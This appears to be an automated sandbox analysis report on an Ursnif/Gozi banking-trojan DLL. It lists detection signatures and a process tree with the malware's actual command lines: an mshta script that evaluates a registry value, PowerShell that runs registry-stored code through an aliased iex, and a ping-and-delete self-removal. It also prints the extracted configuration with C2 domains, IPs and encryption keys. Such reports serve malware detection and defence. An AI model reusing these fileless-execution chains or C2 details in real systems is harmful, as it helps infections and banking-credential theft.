Edit tour
Windows
Analysis Report
rXN8OIpbzz
Overview
General Information
| Sample Name: | rXN8OIpbzz (renamed file extension from none to dll) |
| Analysis ID: | 620156 |
| MD5: | 6e21e2268df053e95557a2157ff33103 |
| SHA1: | efeefb5833b881475bd421da29719d578babb90c |
| SHA256: | 22a462b2da9c893b5f37dbbc19697d6aeaa28758c2338fca3a806e8d9d3ac483 |
| Tags: | dllgozi_ifsbursnif3000 |
| Infos: |  |
 | |
Detection
Ursnif
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Writes to foreign memory regions
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Creates a thread in another existing process (thread injection)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
loaddll32.exe (PID: 6176 cmdline: loaddll32. exe "C:\Us ers\user\D esktop\rXN 8OIpbzz.dl l" MD5: 7DEB5DB86C0AC789123DEC286286B938) 
cmd.exe (PID: 6200 cmdline: cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\rXN 8OIpbzz.dl l",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D) 
rundll32.exe (PID: 6240 cmdline: rundll32.e xe "C:\Use rs\user\De sktop\rXN8 OIpbzz.dll ",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) 
control.exe (PID: 3912 cmdline: C:\Windows \system32\ control.ex e -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F) - rundll32.exe (PID: 3516 cmdline:
"C:\Window s\system32 \rundll32. exe" Shell 32.dll,Con trol_RunDL L -h MD5: 73C519F050C20580F8A62C849D49215A)
mshta.exe (PID: 5240 cmdline: C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Exhe='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Exhe).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\TestL ocal'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) 
powershell.exe (PID: 3172 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name iwcf hbmkpt -va lue gp; ne w-alias -n ame yuxesb -value ie x; yuxesb ([System.T ext.Encodi ng]::ASCII .GetString ((iwcfhbmk pt "HKCU:S oftware\Ap pDataLow\S oftware\Mi crosoft\54 E80703-A33 7-A6B8-CDC 8-873A517C AB0E").Url sReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 3148 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 6404 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\nthaltv x.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 5052 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES3047.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC FB39A90317 3B4FAEAF71 F3E48EC5D0 FF.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 4472 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\zn133k5 0.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 7140 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES4508.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC 41D8DEC26D 8340F3B725 14D252AF58 90.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - explorer.exe (PID: 3968 cmdline:
C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D) - cmd.exe (PID: 6964 cmdline:
C:\Windows \System32\ cmd.exe" / C ping loc alhost -n 5 && del " C:\Users\u ser\Deskto p\rXN8OIpb zz.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 2084 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - PING.EXE (PID: 6176 cmdline:
ping local host -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
- cleanup
{"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| Click to see the 15 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
| Click to see the 4 entries | ||||
⊘No Sigma rule has matched
| Timestamp: | 05/04/22-12:42:53.250349 05/04/22-12:42:53.250349 |
| SID: | 2033203 |
| Source Port: | 49820 |
| Destination Port: | 80 |
| Protocol: | TCP |
| Classtype: | A Network Trojan was detected |
| Timestamp: | 05/04/22-12:42:52.800201 05/04/22-12:42:52.800201 |
| SID: | 2033203 |
| Source Port: | 49820 |
| Destination Port: | 80 |
| Protocol: | TCP |
| Classtype: | A Network Trojan was detected |
| Timestamp: | 05/04/22-12:42:53.707282 05/04/22-12:42:53.707282 |
| SID: | 2033203 |
| Source Port: | 49820 |
| Destination Port: | 80 |
| Protocol: | TCP |
| Classtype: | A Network Trojan was detected |
| Timestamp: | 05/04/22-12:42:32.722808 05/04/22-12:42:32.722808 |
| SID: | 2033203 |
| Source Port: | 49770 |
| Destination Port: | 80 |
| Protocol: | TCP |
| Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |   |
|---|
| Source: | Malware Configuration Extractor: | ||
| Source: | ReversingLabs: | ||
| Source: | Joe Sandbox ML: | ||
| Source: | Code function: | 3_2_04C75FBB | |
| Source: | Static PE information: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Code function: | 3_2_04CB65C2 | |
| Source: | Code function: | 3_2_04CB99BC | |
| Source: | Code function: | 3_2_04CCBAD1 | |
| Source: | Code function: | 3_2_04CBFD47 | |
Networking | |
|---|
| Source: | Network Connect: | Jump to behavior | ||
| Source: | Snort IDS: | ||
| Source: | Snort IDS: | ||
| Source: | Snort IDS: | ||
| Source: | Process created: | ||
| Source: | ASN Name: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | Code function: | 3_2_04C71CA5 | |
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
Key, Mouse, Clipboard, Microphone and Screen Capturing | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
E-Banking Fraud | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | Code function: | 3_2_04C75FBB | |
System Summary | |
|---|
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | WMI Registry write: | ||
| Source: | Static PE information: | ||
| Source: | Code function: | 3_2_04C7829C | |
| Source: | Code function: | 3_2_04C71645 | |
| Source: | Code function: | 3_2_04C74BF1 | |
| Source: | Code function: | 3_2_04CD3DB0 | |
| Source: | Code function: | 3_2_04CC154D | |
| Source: | Code function: | 3_2_04CB67CA | |
| Source: | Code function: | 3_2_04CCD7F1 | |
| Source: | Code function: | 3_2_04CCFF4D | |
| Source: | Code function: | 3_2_04CBB238 | |
| Source: | Code function: | 3_2_04CC8E57 | |
| Source: | Code function: | 3_2_04C7190C | |
| Source: | Code function: | 3_2_04C76D0A | |
| Source: | Code function: | 3_2_04C74321 | |
| Source: | Code function: | 3_2_04C784C1 | |
| Source: | Code function: | 3_2_04CB74AE | |
| Source: | Code function: | 3_2_04CBC431 | |
| Source: | Code function: | 3_2_04CC0782 | |
| Source: | Code function: | 3_2_04CC00DC | |
| Source: | Code function: | 3_2_04CCA806 | |
| Source: | Code function: | 3_2_04CC61AE | |
| Source: | Code function: | 3_2_04CC2331 | |
| Source: | Code function: | 3_2_04CB64C4 | |
| Source: | Code function: | 3_2_04CB36BB | |
| Source: | Code function: | 3_2_04CBB7D5 | |
| Source: | Code function: | 3_2_04CBD77A | |
| Source: | Code function: | 3_2_04CB10C7 | |
| Source: | Code function: | 3_2_04CC3829 | |
| Source: | Code function: | 3_2_04CC7950 | |
| Source: | Code function: | 3_2_04CCEAC5 | |
| Source: | Code function: | 3_2_04CC5220 | |
| Source: | Code function: | 3_2_04CC5312 | |
| Source: | Binary or memory string: | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Static PE information: | ||
| Source: | ReversingLabs: | ||
| Source: | Static PE information: | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Key value queried: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | Classification label: | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Code function: | 3_2_04C768BD | |
| Source: | Process created: | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | File read: | Jump to behavior | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Window detected: | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Static PE information: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Code function: | 3_2_04C7829B | |
| Source: | Code function: | 3_2_04C77EA9 | |
| Source: | Code function: | 3_2_04CB3496 | |
| Source: | Code function: | 3_2_04CD3DAF | |
| Source: | Code function: | 3_2_04CD38A9 | |
| Source: | Static PE information: | ||
| Source: | Code function: | 3_2_04CBEC00 | |
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Static PE information: | ||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | File created: | Jump to dropped file | ||
| Source: | File created: | Jump to dropped file | ||
Hooking and other Techniques for Hiding and Protection | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
Malware Analysis System Evasion | |
|---|
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Thread sleep time: | Jump to behavior | ||
| Source: | Last function: | ||
| Source: | Last function: | ||
| Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
| Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Window / User API: | Jump to behavior | ||
| Source: | Check user administrative privileges: | ||
| Source: | Process information queried: | Jump to behavior | ||
| Source: | Code function: | 3_2_04CB65C2 | |
| Source: | Code function: | 3_2_04CB99BC | |
| Source: | Code function: | 3_2_04CCBAD1 | |
| Source: | Thread delayed: | Jump to behavior | ||
| Source: | Code function: | 3_2_04CBFD47 | |
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Code function: | 3_2_04CBEC00 | |
| Source: | Process queried: | Jump to behavior | ||
| Source: | Code function: | 3_2_04CB8FEC | |
HIPS / PFW / Operating System Protection Evasion | |
|---|
| Source: | Network Connect: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Memory written: | Jump to behavior | ||
| Source: | Thread created: | Jump to behavior | ||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Binary or memory string: | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Queries volume information: | Jump to behavior | ||
| Source: | Code function: | 3_2_04C73365 | |
| Source: | Key value queried: | Jump to behavior | ||
| Source: | Code function: | 3_2_04CC81F1 | |
| Source: | Code function: | 3_2_04C776BB | |
| Source: | Code function: | 3_2_04C76D78 | |
| Source: | Code function: | 3_2_04C73365 | |
Stealing of Sensitive Information | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
Remote Access Functionality | |
|---|
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Source: | File source: | ||
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
